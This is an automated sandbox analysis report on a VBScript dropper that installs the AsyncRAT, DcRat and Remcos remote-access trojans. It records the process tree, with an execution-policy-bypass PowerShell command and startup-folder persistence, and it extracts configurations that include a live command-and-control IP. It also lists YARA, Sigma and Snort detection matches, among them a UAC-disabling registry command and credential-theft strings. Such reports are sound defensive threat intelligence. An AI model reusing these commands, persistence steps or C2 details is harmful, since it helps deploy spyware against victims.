Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lmg1_Mlakaifa443456.vbs

Overview

General Information

Sample name:lmg1_Mlakaifa443456.vbs
Analysis ID:1431185
MD5:ade48125e600ea0434a894e7c5131462
SHA1:8b5e29fc3d490ebcba5295332c601d8165a67ec5
SHA256:2f7971748b7db79bdd724861d1b463b0489b790b9e60e733dea409f73abf9539
Tags:HUNvbs
Infos:

Detection

AsyncRAT, DcRat, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Sigma detected: Potential Persistence Via COM Hijacking From Suspicious Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 380 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 5144 cmdline: "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • regsvr32.exe (PID: 3128 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • RegAsm.exe (PID: 4148 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • cmd.exe (PID: 2452 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4820 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • wscript.exe (PID: 6640 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
              • regsvr32.exe (PID: 1272 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • winhlp32.exe (PID: 3252 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
              • regsvr32.exe (PID: 3116 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • winhlp32.exe (PID: 6540 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
              • regsvr32.exe (PID: 6460 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • winhlp32.exe (PID: 6404 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
              • regsvr32.exe (PID: 3620 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • winhlp32.exe (PID: 6448 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
      • regsvr32.exe (PID: 1788 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • RegAsm.exe (PID: 4068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • regsvr32.exe (PID: 4436 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • RegAsm.exe (PID: 3160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • regsvr32.exe (PID: 5672 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • RegAsm.exe (PID: 2964 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • wscript.exe (PID: 4676 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 3852 cmdline: "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • regsvr32.exe (PID: 6664 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • winhlp32.exe (PID: 2824 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
      • regsvr32.exe (PID: 5064 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • winhlp32.exe (PID: 1560 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
      • regsvr32.exe (PID: 2616 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • winhlp32.exe (PID: 3580 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
      • regsvr32.exe (PID: 2848 cmdline: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • winhlp32.exe (PID: 3396 cmdline: "C:\Windows\winhlp32.exe" MD5: 0629E6D130F226C009EA9AB329F37ACC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: AsyncRAT

{"Ports": ["6666"], "Server": ["139.99.133.66"], "Mutex": "MIGUELANGELES", "Certificate": "MIICKzCCAZSgAwIBAgIVAO5NCNVriIgVqdmZuiqdaFkGqjLvMA0GCSqGSIb3DQEBDQUAMF8xEDAOBgNVBAMMB2FzYXNhc2ExEzARBgNVBAsMCnF3cWRhbmNodW4xHDAaBgNVBAoME0RjUmF0IEJ5IHF3cWRhbmNodW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yMzA3MDQxMzM1NTVaFw0zNDA0MTIxMzM1NTVaMBAxDjAMBgNVBAMMBURjUmF0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCB82Ur6soO7/5apLmyoS9issJODa4S2r9uXXSHnwNbxCISNhPMELugVRoPjyUDUW4n1Fk01iBzGqSOwgQ9lAMbkbpzB+w9E5EpaHThe4KVOEhhL5dLGojfNgvbD3URbOIgpzRgkJf2x8wigUMRLBR1fYytIOWAbL3y9rwAXGlnxwIDAQABozIwMDAdBgNVHQ4EFgQUT1sA15K/oe8QOOxFi7To7KxJB/MwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQAZ+eiDeOgMA0GmKyVtNdthd/UbaqT49UyogROnA13GWYKSSOgs8BYLv/G/anZvkI72fR3/RF1jiSHuPwgqFetcHE6po6u5vRPho4yLVHGOPy8PtoxHiCHPOkORnHUGDTrs8HuSOkQpXyOgRXbLcVtVIbcfBFns3UKHcJ7IO0tuBA==", "Server Signature": "N3pZ2YCPJotv4dO0p9r4yZEeDnvpp9s/wXezrLSSJXN20FTY+KcXcOXJBRQV13FUX0FmBygTW0WXV3x9TGBjM7Nv//rhhRRRW37HV7bBW576W+8wt5cQpEzjMa5sPAAojC48387uRm7G9EfI2GVf5h3nL8PFY9Kvhbt1sQWDbvI="}

Threatname: Remcos

{"Host:Port:Password": "139.99.133.66:4444:0", "Assigned name": "ADFLY", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "asasasas-SEG6JT", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x3a2:$b2: DcRat By qwqdanchun1

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6c4a8:$a1: Remcos restarted by watchdog!
      • 0x6ca20:$a3: %02i:%02i:%02i:%03i
      00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6656c:$str_b2: Executing file:
      • 0x675ec:$str_b3: GetDirectListeningPort
      • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x67118:$str_b7: \update.vbs
      • 0x66594:$str_b9: Downloaded file:
      • 0x66580:$str_b10: Downloading file:
      • 0x66624:$str_b12: Failed to upload file:
      • 0x675b4:$str_b13: StartForward
      • 0x675d4:$str_b14: StopForward
      • 0x67070:$str_b15: fso.DeleteFile "
      • 0x67004:$str_b16: On Error Resume Next
      • 0x670a0:$str_b17: fso.DeleteFolder "
      • 0x66614:$str_b18: Uploaded file:
      • 0x665d4:$str_b19: Unable to delete:
      • 0x67038:$str_b20: while fso.FileExists("
      • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
      00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6637c:$s1: CoGetObject
      • 0x66390:$s1: CoGetObject
      • 0x663ac:$s1: CoGetObject
      • 0x70338:$s1: CoGetObject
      • 0x6633c:$s2: Elevation:Administrator!new:
      Click to see the 88 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.wscript.exe.5670000.0.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        2.2.wscript.exe.5670000.0.raw.unpackWindows_Trojan_DCRat_1aeea1acunknownunknown
        • 0x65ff:$a1: havecamera
        • 0x9a7c:$a2: timeout 3 > NUL
        • 0x9a9c:$a3: START "" "
        • 0x9927:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
        • 0x99dc:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
        2.2.wscript.exe.5670000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_B64_ArtifactsDetects executables embedding bas64-encoded APIs, command lines, registry keys, etc.ditekSHen
        • 0x99dc:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
        • 0x9927:$s2: L2Mgc2NodGFza3MgL2
        • 0x98a6:$s3: QW1zaVNjYW5CdWZmZXI
        • 0x98f4:$s4: VmlydHVhbFByb3RlY3Q
        2.2.wscript.exe.5670000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
        • 0x9c5e:$q1: Select * from Win32_CacheMemory
        • 0x9c9e:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
        • 0x9cec:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
        • 0x9d3a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
        2.2.wscript.exe.5670000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_DcRatByDetects executables containing the string DcRatByditekSHen
        • 0xa0d6:$s1: DcRatBy
        Click to see the 120 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Potential Persistence Via COM Hijacking From Suspicious Locations
        Source: Registry Key setAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Details: C:\Users\user\AppData\Local\Temp\dynwrapx.dll, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\regsvr32.exe, ProcessId: 3128, TargetObject: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\(Default)
        Sigma detected: Potentially Suspicious Malware Callback Communication
        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 139.99.133.66, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\winhlp32.exe, Initiated: true, ProcessId: 3252, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49715
        Sigma detected: Potentially Suspicious PowerShell Child Processes
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , ProcessId: 6640, ProcessName: wscript.exe
        Sigma detected: Script Interpreter Execution From Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , ProcessId: 6640, ProcessName: wscript.exe
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , ProcessId: 4820, ProcessName: powershell.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", ProcessId: 380, ProcessName: wscript.exe
        Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll", CommandLine: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5144, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll", ProcessId: 3128, ProcessName: regsvr32.exe
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 6640, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", ProcessId: 380, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , ProcessId: 4820, ProcessName: powershell.exe

        Data Obfuscation

        barindex
        Sigma detected: Drops script at startup location
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 6640, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs

        Snort Signatures

        Timestamp:04/24/24-17:04:24.767265
        SID:2032777
        Source Port:4444
        Destination Port:49715
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/24/24-17:04:24.390969
        SID:2032776
        Source Port:49715
        Destination Port:4444
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/24/24-17:04:03.847489
        SID:2848152
        Source Port:6666
        Destination Port:49704
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: lmg1_Mlakaifa443456.vbsAvira: detected
        Antivirus detection for URL or domain
        Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
        Found malware configuration
        Source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "139.99.133.66:4444:0", "Assigned name": "ADFLY", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "asasasas-SEG6JT", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
